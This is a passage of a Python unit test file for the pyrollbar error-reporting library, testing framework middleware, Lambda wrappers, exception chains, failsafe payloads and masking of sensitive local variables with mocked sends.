middleware = [Middleware(ReporterMiddleware)] app = Starlette(routes=routes, middleware=middleware) client = TestClient(app) response = client.get('/test?param1=value1&param2=value2') self.assertEqual(response.status_code, 200) @unittest.skipUnless(sys.version_info >= (3, 6), 'Python3.6+ required') def test_get_request_starlette_logger(self): try: from starlette.applications import Starlette from starlette.middleware import Middleware from starlette.responses import PlainTextResponse from starlette.routing import Route from starlette.testclient import TestClient except ImportError: self.skipTest('Requires Starlette package') from rollbar.contrib.starlette import ReporterMiddleware def root(starlette_request): current_request = rollbar.get_request() self.assertEqual(current_request, starlette_request) return PlainTextResponse("bye bye") routes = [Route('/{param}', root)] middleware = [Middleware(ReporterMiddleware)] app = Starlette(routes=routes, middleware=middleware) client = TestClient(app) response = client.get('/test?param1=value1&param2=value2') self.assertEqual(response.status_code, 200) @unittest.skipUnless(sys.version_info >= (3, 6), 'Python3.6+ required') def test_get_request_fastapi_middleware(self): try: from fastapi import
FastAPI, Request from fastapi.testclient import TestClient except ImportError: self.skipTest('Requires FastAPI package') from rollbar.contrib.fastapi import ReporterMiddleware app = FastAPI() app.add_middleware(ReporterMiddleware) # Inject annotations and decorate endpoint dynamically # to avoid SyntaxError for older Python # # This is the code we'd use if we had not loaded the test file on Python 2. # # @app.get('/{param}') # def root(param, fastapi_request: Request): # current_request = rollbar.get_request() # # self.assertEqual(current_request, fastapi_request) def root(param, fastapi_request): current_request = rollbar.get_request() self.assertEqual(current_request, fastapi_request) root = fastapi_add_route_with_request_param( app, root, '/{param}', 'fastapi_request' ) client = TestClient(app) response = client.get('/test?param1=value1&param2=value2') self.assertEqual(response.status_code, 200) @unittest.skipUnless(sys.version_info >= (3, 6), 'Python3.6+ required') def test_get_request_fastapi_logger(self): try: from fastapi import FastAPI, Request from fastapi.testclient import TestClient except ImportError: self.skipTest('Requires FastAPI package') from rollbar.contrib.fastapi import ReporterMiddleware app = FastAPI() app.add_middleware(ReporterMiddleware) # Inject annotations and decorate endpoint dynamically # to avoid SyntaxError for older Python # # This is the code we'd use if we had not loaded the test file on Python 2. # # @app.get('/{param}') # def root(fastapi_request: Request): # current_request = rollbar.get_request() # # self.assertEqual(current_request, fastapi_request) def root(param, fastapi_request): current_request = rollbar.get_request() self.assertEqual(current_request, fastapi_request) root = fastapi_add_route_with_request_param( app, root, '/{param}', 'fastapi_request' ) client = TestClient(app) response = client.get('/test?param1=value1&param2=value2') self.assertEqual(response.status_code, 200) @unittest.skipUnless(sys.version_info >= (3, 6), 'Python3.6+ required') def test_get_request_fastapi_router(self): try: import fastapi from fastapi import FastAPI, Request from fastapi.testclient import TestClient except ImportError: self.skipTest('Requires FastAPI package') from rollbar.contrib.fastapi import add_to as rollbar_add_to if fastapi.__version__ < '0.41.0': self.skipTest('Requires FastAPI 0.41.0+') app = FastAPI() rollbar_add_to(app) # Inject annotations and decorate endpoint dynamically # to avoid SyntaxError for older Python # # This is the code we'd use if we had not loaded the test file on Python 2.
# # @app.get('/{param}') # def root(fastapi_request: Request): # current_request = rollbar.get_request() # # self.assertEqual(current_request, fastapi_request) def root(param, fastapi_request): current_request = rollbar.get_request() self.assertEqual(current_request, fastapi_request) root = fastapi_add_route_with_request_param( app, root, '/{param}', 'fastapi_request' ) client = TestClient(app) response = client.get('/test?param1=value1&param2=value2') self.assertEqual(response.status_code, 200) @mock.patch('rollbar.send_payload') def test_report_exception(self, send_payload): def _raise(): try: raise Exception('foo') except: rollbar.report_exc_info() _raise() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['access_token'], _test_access_token) self.assertIn('body', payload['data']) self.assertIn('trace', payload['data']['body']) self.assertNotIn('trace_chain', payload['data']['body']) self.assertIn('exception', payload['data']['body']['trace']) self.assertEqual(payload['data']['body']['trace']['exception']['message'], 'foo') self.assertEqual(payload['data']['body']['trace']['exception']['class'], 'Exception') self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('locals', payload['data']['body']['trace']['frames'][-1]) @mock.patch('rollbar._post_api') def test_lambda_function_good(self, _post_api): rollbar.SETTINGS['handler'] = 'thread' fake_event = {'a': 42} fake_context = MockLambdaContext(99) @rollbar.lambda_function def my_lambda_func(event, context): return [event['a'], context.x] result = my_lambda_func(fake_event, fake_context) self.assertEqual(len(result), 2) self.assertEqual(result[0], 42) self.assertEqual(result[1], 99) self.assertEqual(_post_api.called, False) rollbar._CURRENT_LAMBDA_CONTEXT = None rollbar.SETTINGS['handler'] = 'blocking' @mock.patch('rollbar._post_api') def test_lambda_function_bad(self, _post_api): rollbar.SETTINGS['handler'] = 'thread' fake_event = {'a': 42} fake_context = MockLambdaContext(99) @rollbar.lambda_function def my_lambda_func(event, context): raise event['a'] result = None try: result = my_lambda_func(fake_event, fake_context) except: pass self.assertEqual(result, None) self.assertEqual(_post_api.called, True) rollbar._CURRENT_LAMBDA_CONTEXT = None rollbar.SETTINGS['handler'] = 'blocking' @mock.patch('rollbar._post_api') def test_lambda_function_method_good(self, _post_api): rollbar.SETTINGS['handler'] = 'thread' fake_event = {'a': 42} fake_context = MockLambdaContext(99) class LambdaClass(object): def __init__(self): self.a = 13 def my_lambda_func(self, event, context): return [event['a'], context.x, self.a] app = LambdaClass() app.my_lambda_func = rollbar.lambda_function(app.my_lambda_func) result = app.my_lambda_func(fake_event, fake_context) self.assertEqual(len(result), 3) self.assertEqual(result[0], 42) self.assertEqual(result[1], 99) self.assertEqual(result[2], 13) self.assertEqual(_post_api.called, False) rollbar._CURRENT_LAMBDA_CONTEXT = None rollbar.SETTINGS['handler'] = 'blocking' @mock.patch('rollbar._post_api') def test_lambda_function_method_bad(self, _post_api): rollbar.SETTINGS['handler'] = 'thread' fake_event = {'a': 42} fake_context = MockLambdaContext(99) class LambdaClass(object): def __init__(self): self.a = 13 def my_lambda_func(self, event, context): raise self.a app = 
LambdaClass() app.my_lambda_func = rollbar.lambda_function(app.my_lambda_func) result = None try: result = app.my_lambda_func(fake_event, fake_context) except: pass self.assertEqual(result, None) self.assertEqual(_post_api.called, True) rollbar._CURRENT_LAMBDA_CONTEXT = None rollbar.SETTINGS['handler'] = 'blocking' @mock.patch('rollbar.send_payload') def test_report_exception_with_cause(self, send_payload): def _raise_cause(): bar_local = 'bar' raise CauseException('bar') def _raise_ex(): try: _raise_cause() except CauseException as cause: # python2 won't automatically assign this traceback... exc_info = sys.exc_info() setattr(cause, '__traceback__', exc_info[2]) try: foo_local = 'foo' # in python3 this would normally be expressed as # raise Exception('foo') from cause e = Exception('foo') setattr(e, '__cause__', cause) # PEP-3134 raise e except: rollbar.report_exc_info() _raise_ex() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['access_token'], _test_access_token) self.assertIn('body', payload['data']) self.assertNotIn('trace', payload['data']['body']) self.assertIn('trace_chain', payload['data']['body']) self.assertEqual(2, len(payload['data']['body']['trace_chain'])) self.assertIn('exception', payload['data']['body']['trace_chain'][0]) self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['message'], 'foo') self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['class'], 'Exception') self.assertEqual(payload['data']['body']['trace_chain'][0]['frames'][-1]['locals']['foo_local'], 'foo') self.assertIn('exception', payload['data']['body']['trace_chain'][1]) self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['message'], 'bar') self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['class'], 'CauseException') self.assertEqual(payload['data']['body']['trace_chain'][1]['frames'][-1]['locals']['bar_local'], 'bar') @mock.patch('rollbar.send_payload') def test_report_exception_with_same_exception_as_cause(self, send_payload): cause_exc = CauseException('bar') def _raise_cause(): bar_local = 'bar' raise cause_exc def _raise_ex(): try: _raise_cause() except CauseException as cause: # python2 won't automatically assign this traceback... 
exc_info = sys.exc_info() setattr(cause, '__traceback__', exc_info[2]) try: foo_local = 'foo' # in python3 this would normally be expressed as # raise cause from cause setattr(cause, '__cause__', cause) # PEP-3134 raise cause except: rollbar.report_exc_info() ex_raiser = threading.Thread(target=_raise_ex) ex_raiser.daemon = True ex_raiser.start() # 0.5 seconds ought be enough for any modern computer to get into the # cyclical parts of the code, but not so long as to collect a lot of # objects in memory ex_raiser.join(timeout=0.5) if ex_raiser.is_alive(): # This breaks the circular reference, allowing thread to exit and # to be joined cause_exc.__cause__ = None ex_raiser.join() self.fail('Cyclic reference in rollbar._walk_trace_chain()') self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['access_token'], _test_access_token) self.assertIn('body', payload['data']) self.assertNotIn('trace', payload['data']['body']) self.assertIn('trace_chain', payload['data']['body']) self.assertEqual(2, len(payload['data']['body']['trace_chain'])) self.assertIn('exception', payload['data']['body']['trace_chain'][0]) self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['message'], 'bar') self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['class'], 'CauseException') frames = payload['data']['body']['trace_chain'][0]['frames'] self.assertEqual(payload['data']['body']['trace_chain'][0]['frames'][0]['locals']['foo_local'], 'foo') self.assertIn('exception', payload['data']['body']['trace_chain'][1]) self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['message'], 'bar') self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['class'], 'CauseException') self.assertEqual(payload['data']['body']['trace_chain'][1]['frames'][-1]['locals']['bar_local'], 'bar') @mock.patch('rollbar.send_payload') def test_report_exception_with_context(self, send_payload): def _raise_context(): bar_local = 'bar' raise CauseException('bar') def _raise_ex(): try: _raise_context() except CauseException as context: # python2 won't automatically assign this traceback... 
exc_info = sys.exc_info() setattr(context, '__traceback__', exc_info[2]) try: foo_local = 'foo' # in python3 __context__ is automatically set when an exception is raised in an except block e = Exception('foo') setattr(e, '__context__', context) # PEP-3134 raise e except: rollbar.report_exc_info() _raise_ex() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['access_token'], _test_access_token) self.assertIn('body', payload['data']) self.assertNotIn('trace', payload['data']['body']) self.assertIn('trace_chain', payload['data']['body']) self.assertEqual(2, len(payload['data']['body']['trace_chain'])) self.assertIn('exception', payload['data']['body']['trace_chain'][0]) self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['message'], 'foo') self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['class'], 'Exception') self.assertEqual(payload['data']['body']['trace_chain'][0]['frames'][-1]['locals']['foo_local'], 'foo') self.assertIn('exception', payload['data']['body']['trace_chain'][1]) self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['message'], 'bar') self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['class'], 'CauseException') self.assertEqual(payload['data']['body']['trace_chain'][1]['frames'][-1]['locals']['bar_local'], 'bar') @mock.patch('rollbar.send_payload') def test_exception_filters(self, send_payload): rollbar.SETTINGS['exception_level_filters'] = [ (OSError, 'ignored'), ('rollbar.ApiException', 'ignored'), ('bogus.DoesntExist', 'ignored'), ] def _raise_exception(): try: raise Exception('foo') except: rollbar.report_exc_info() def _raise_os_error(): try: raise OSError('bar') except: rollbar.report_exc_info() def _raise_api_exception(): try: raise rollbar.ApiException('bar') except: rollbar.report_exc_info() _raise_exception() self.assertTrue(send_payload.called) _raise_os_error() self.assertEqual(1, send_payload.call_count) _raise_api_exception() self.assertEqual(1, send_payload.call_count) @mock.patch('rollbar.send_payload') def test_report_message(self, send_payload): rollbar.report_message('foo') self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['access_token'], _test_access_token) self.assertIn('body', payload['data']) self.assertIn('message', payload['data']['body']) self.assertIn('body', payload['data']['body']['message']) self.assertEqual(payload['data']['body']['message']['body'], 'foo') @mock.patch('rollbar.send_payload') def test_uuid(self, send_payload): uuid = rollbar.report_message('foo') payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['uuid'], uuid) @mock.patch('rollbar.send_payload') def test_report_exc_info_level(self, send_payload): try: raise Exception('level_error') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['level'], 'error') try: raise Exception('level_info') except: rollbar.report_exc_info(level='info') self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['level'], 'info') # payload takes precedence over 'level' try: raise Exception('payload_warn') except: rollbar.report_exc_info(level='info', payload_data={'level': 'warn'}) self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['level'], 'warn')
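    # Illustrative sketch (not part of the original suite): the same level
    # precedence seen in test_report_exc_info_level above should also apply
    # to report_message(), whose `level` argument is overridden by an
    # explicit payload_data level. The method name below is hypothetical,
    # and the override behavior is an assumption based on the test above.
    @mock.patch('rollbar.send_payload')
    def test_report_message_level_precedence_sketch(self, send_payload):
        rollbar.report_message('foo', level='info',
                               payload_data={'level': 'warn'})
        payload = send_payload.call_args[0][0]
        self.assertEqual(payload['data']['level'], 'warn')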
@mock.patch('rollbar.send_payload') def test_report_exc_info_nones(self, send_payload): rollbar.report_exc_info(exc_info=(None, None, None)) self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['level'], 'error') @mock.patch('rollbar._send_failsafe') @mock.patch('rollbar.lib.transport.post', side_effect=lambda *args, **kw: MockResponse({'status': 'Payload Too Large'}, 413)) def test_trigger_failsafe(self, post, _send_failsafe): rollbar.report_message('derp') self.assertEqual(_send_failsafe.call_count, 1) try: raise Exception('trigger_failsafe') except: rollbar.report_exc_info() self.assertEqual(_send_failsafe.call_count, 2) @mock.patch('rollbar._send_failsafe') @mock.patch('rollbar.lib.transport.post', side_effect=lambda *args, **kw: MockRawResponse('<html>\r\n' \ '<head><title>502 Bad Gateway</title></head>\r\n' \ '<body bgcolor="white">\r\n' \ '<center><h1>502 Bad Gateway</h1></center>\r\n' \ '<hr><center>nginx</center>\r\n' \ '</body>\r\n' \ '</html>\r\n', 502)) def test_502_failsafe(self, post, _send_failsafe): rollbar.report_message('derp') # self.assertEqual(_send_failsafe.call_count, 1) try: raise Exception('trigger_failsafe') except: rollbar._post_api('/api/1/item', {'derp'}) @mock.patch('rollbar.send_payload') def test_send_failsafe(self, send_payload): test_uuid = str(uuid.uuid4()) test_host = socket.gethostname() test_data = { 'access_token': _test_access_token, 'data': { 'body': { 'message': { 'body': 'Failsafe from pyrollbar: test message. ' 'Original payload may be found in your server ' 'logs by searching for the UUID.' } }, 'failsafe': True, 'level': 'error', 'custom': { 'orig_host': test_host, 'orig_uuid': test_uuid }, 'environment': rollbar.SETTINGS['environment'], 'internal': True, 'notifier': rollbar.SETTINGS['notifier'] } } rollbar._send_failsafe('test message', test_uuid, test_host) self.assertEqual(send_payload.call_count, 1) self.assertEqual(send_payload.call_args[0][0], test_data) @mock.patch('rollbar.log.exception') @mock.patch('rollbar.send_payload', side_effect=Exception('Monkey Business!')) def test_fail_to_send_failsafe(self, send_payload, mock_log): test_uuid = str(uuid.uuid4()) test_host = socket.gethostname() rollbar._send_failsafe('test message', test_uuid, test_host) self.assertEqual(mock_log.call_count, 1) @unittest.skipUnless(rollbar.AsyncHTTPClient, 'Requires async handler to be installed') @mock.patch('rollbar._send_payload_async') def test_async_handler(self, send_payload_async): def _raise(): try: raise Exception('foo') except: rollbar.report_exc_info() rollbar.SETTINGS['handler'] = 'async' _raise() send_payload_async.assert_called_once() @unittest.skipUnless(rollbar.httpx, 'Requires HTTPX to be installed') @mock.patch('rollbar._send_payload_httpx') def test_httpx_handler(self, send_payload_httpx): def _raise(): try: raise Exception('foo') except: rollbar.report_exc_info() rollbar.SETTINGS['handler'] = 'async' _raise() send_payload_httpx.assert_called_once() @mock.patch('rollbar.send_payload') def test_args_constructor(self, send_payload): class tmp(object): def __init__(self, arg1): self.arg1 = arg1 foo() try: t = tmp(33) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) 
self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual(33, payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) @mock.patch('rollbar.send_payload') def test_failed_locals_serialization(self, send_payload): class tmp(object): @property def __class__(self): foo() try: t = tmp() raise Exception('trigger_serialize') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) @mock.patch('rollbar.send_payload') def test_args_lambda_no_args(self, send_payload): _raise = lambda: foo() try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('locals', payload['data']['body']['trace']['frames'][-1]) @mock.patch('rollbar.send_payload') def test_args_lambda_with_args(self, send_payload): _raise = lambda arg1, arg2: foo(arg1, arg2) try: _raise('arg1-value', 'arg2-value') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('arg1-value', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) self.assertEqual('arg2', payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual('arg2-value', payload['data']['body']['trace']['frames'][-1]['locals']['arg2']) @mock.patch('rollbar.send_payload') def test_args_lambda_with_defaults(self, send_payload): _raise = lambda arg1='default': foo(arg1) try: _raise(arg1='arg1-value') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) # NOTE(cory): Lambdas are a bit strange. We treat default values for lambda args # as positional. 
self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('arg1-value', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) @mock.patch('rollbar.send_payload') def test_args_lambda_with_star_args(self, send_payload): _raise = lambda *args: foo(arg1) try: _raise('arg1-value') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) varargs = payload['data']['body']['trace']['frames'][-1]['varargspec'] self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['locals'][varargs])) self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals'][varargs][0], r'\*+') @mock.patch('rollbar.send_payload') def test_args_lambda_with_star_args_and_args(self, send_payload): _raise = lambda arg1, *args: foo(arg1) try: _raise('arg1-value', 1, 2) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) varargs = payload['data']['body']['trace']['frames'][-1]['varargspec'] self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('arg1-value', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['locals'][varargs])) self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals'][varargs][0], r'\*+') self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals'][varargs][1], r'\*+') @mock.patch('rollbar.send_payload') def test_args_lambda_with_kwargs(self, send_payload): _raise = lambda **kwargs: foo(arg1) try: _raise(arg1='arg1-value', arg2=2) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) keywords = payload['data']['body']['trace']['frames'][-1]['keywordspec'] self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['locals'][keywords])) self.assertEqual('arg1-value', payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['arg1']) self.assertEqual(2, payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['arg2']) @mock.patch('rollbar.send_payload') def test_args_lambda_with_kwargs_and_args(self, send_payload): _raise = lambda arg1, arg2, **kwargs: foo(arg1) try: _raise('a1', 'a2', arg3='arg3-value', arg4=2) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('keywordspec', 
payload['data']['body']['trace']['frames'][-1]) keywords = payload['data']['body']['trace']['frames'][-1]['keywordspec'] self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('arg2', payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual('a1', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) self.assertEqual('a2', payload['data']['body']['trace']['frames'][-1]['locals']['arg2']) self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['locals'][keywords])) self.assertEqual('arg3-value', payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['arg3']) self.assertEqual(2, payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['arg4']) @mock.patch('rollbar.send_payload') def test_args_lambda_with_kwargs_and_args_and_defaults(self, send_payload): _raise = lambda arg1, arg2, arg3='default-value', **kwargs: foo(arg1) try: _raise('a1', 'a2', arg3='arg3-value', arg4=2) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) keywords = payload['data']['body']['trace']['frames'][-1]['keywordspec'] # NOTE(cory): again, default values are strange for lambdas and we include them as # positional args. self.assertEqual(3, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('arg2', payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual('arg3', payload['data']['body']['trace']['frames'][-1]['argspec'][2]) self.assertEqual('a1', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) self.assertEqual('a2', payload['data']['body']['trace']['frames'][-1]['locals']['arg2']) self.assertEqual('arg3-value', payload['data']['body']['trace']['frames'][-1]['locals']['arg3']) self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['locals'][keywords])) self.assertEqual(2, payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['arg4']) @mock.patch('rollbar.send_payload') def test_args_generators(self, send_payload): def _raise(arg1): for i in range(2): if i > 0: raise Exception() else: yield i try: l = list(_raise('hello world')) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual(1, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual('hello world', payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) @mock.patch('rollbar.send_payload') def test_anonymous_tuple_args(self, send_payload): # Only run this test on Python versions that support it if not _anonymous_tuple_func: return try: _anonymous_tuple_func((1, (2, 3), 4)) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = 
send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual(4, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual(1, payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertEqual(2, payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual(3, payload['data']['body']['trace']['frames'][-1]['argspec'][2]) self.assertEqual(4, payload['data']['body']['trace']['frames'][-1]['argspec'][3]) self.assertEqual(10, payload['data']['body']['trace']['frames'][-1]['locals']['ret']) @mock.patch('rollbar.send_payload') def test_scrub_defaults(self, send_payload): def _raise(password='sensitive', clear='text'): headers = { 'Authorization': 'bearer 123' } raise Exception() try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('kwargs', payload['data']['body']['trace']['frames'][-1]['locals']) self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['argspec'])) self.assertEqual('password', payload['data']['body']['trace']['frames'][-1]['argspec'][0]) self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals']['password'], r'\*+') self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals']['headers']['Authorization'], r'\*+') self.assertEqual('clear', payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual('text', payload['data']['body']['trace']['frames'][-1]['locals']['clear']) @mock.patch('rollbar.send_payload') def test_dont_scrub_star_args(self, send_payload): rollbar.SETTINGS['locals']['scrub_varargs'] = False def _raise(*args): raise Exception() try: _raise('sensitive', 'text') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('locals', payload['data']['body']['trace']['frames'][-1]) varargspec = payload['data']['body']['trace']['frames'][-1]['varargspec'] self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['locals'][varargspec])) self.assertEqual(payload['data']['body']['trace']['frames'][-1]['locals'][varargspec][0], 'sensitive') self.assertEqual(payload['data']['body']['trace']['frames'][-1]['locals'][varargspec][1], 'text') @mock.patch('rollbar.send_payload') def test_scrub_kwargs(self, send_payload): def _raise(**kwargs): raise Exception() try: _raise(password='sensitive', clear='text') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) keywords = payload['data']['body']['trace']['frames'][-1]['keywordspec'] self.assertEqual(2, len(payload['data']['body']['trace']['frames'][-1]['locals'][keywords])) self.assertIn('password', 
payload['data']['body']['trace']['frames'][-1]['locals'][keywords]) self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['password'], r'\*+') self.assertIn('clear', payload['data']['body']['trace']['frames'][-1]['locals'][keywords]) self.assertEqual('text', payload['data']['body']['trace']['frames'][-1]['locals'][keywords]['clear']) @mock.patch('rollbar.send_payload') def test_scrub_locals(self, send_payload): invalid_b64 = b'CuX2JKuXuLVtJ6l1s7DeeQ==' invalid = base64.b64decode(invalid_b64) def _raise(): # Make sure that the _invalid local variable makes its # way into the payload even if its value cannot be serialized # properly. _invalid = invalid # Make sure the Password field gets scrubbed even though its # original value could not be serialized properly. Password = invalid password = 'sensitive' raise Exception((_invalid, Password, password)) try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals']['password'], r'\*+') self.assertRegex(payload['data']['body']['trace']['frames'][-1]['locals']['Password'], r'\*+') self.assertIn('_invalid', payload['data']['body']['trace']['frames'][-1]['locals']) binary_type_name = 'str' if python_major_version() < 3 else 'bytes' undecodable_message = '<Undecodable type:(%s) base64:(%s)>' % (binary_type_name, base64.b64encode(invalid).decode('ascii')) self.assertEqual(undecodable_message, payload['data']['body']['trace']['frames'][-1]['locals']['_invalid']) @mock.patch('rollbar.send_payload') def test_scrub_nans(self, send_payload): def _raise(): infinity = float('Inf') negative_infinity = float('-Inf') not_a_number = float('NaN') raise Exception() try: _raise() except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual('<Infinity>', payload['data']['body']['trace']['frames'][-1]['locals']['infinity']) self.assertEqual('<NegativeInfinity>', payload['data']['body']['trace']['frames'][-1]['locals']['negative_infinity']) self.assertEqual('<NaN>', 